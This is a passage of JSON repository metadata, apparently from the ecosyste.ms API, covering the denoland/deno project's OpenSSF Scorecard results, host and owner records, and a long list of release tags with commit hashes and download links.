pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"